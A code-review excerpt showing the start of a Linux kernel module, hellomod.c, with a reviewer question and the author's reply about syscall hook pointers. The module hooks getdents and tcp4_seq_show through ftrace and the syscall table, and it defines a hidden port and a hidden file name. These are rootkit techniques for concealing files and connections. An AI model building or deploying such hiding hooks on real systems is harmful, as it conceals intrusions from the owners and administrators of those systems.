hellomod.c

```diff
@@ -0,0 +1,65 @@
+#define MODULE
+#define LINUX
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/kallsyms.h>
+#include <linux/uaccess.h>
+#include <linux/unistd.h>
+#include <linux/slab.h>
+#include <linux/compiler.h>
+#include <linux/types.h>
+#include <linux/proc_fs.h>
+#include <linux/ftrace.h>
+#include <linux/socket.h>
+#include <net/sock.h>
+#include <linux/trace.h>
+#include <linux/seq_file.h>
+
+#define HIDDEN_PORT 8080
+#define HIDDEN_FILE_NAME "myfile"
+
+#include "ftrace_utils.c"
+#include "syshook_utils.c"
+#include "hook_functions/tcp_seq_show.c"
+#include "hook_functions/getdents.c"
+
+static struct ftrace_hook tcp_seq_show_fhook = {
+    .hook_func = hook_tcp4_seq_show,
+    .orig_func_pointer = (void**)&org_tcp4_seq_show,
+};
+
+static struct sys_hook sys_hooks[] = {
+    {
+        .orig_func_pointer = (void**)&original_getdents,
```

Comment:
can't you just assign `NULL` to `orig_func_pointer`? Don't you override it later?

Reply:
Not exactly, orig_func_pointer is a pointer to a pointer to a function. 
While installing the hook I set 'original_getdents' to point on the original function:
*((unsigned long*) hooks[i].orig_func_pointer) = (unsigned long) p_sys_call_table[hooks[i].sys_entry];

So when I call original_getdents from inside getdents_hook its already initialized.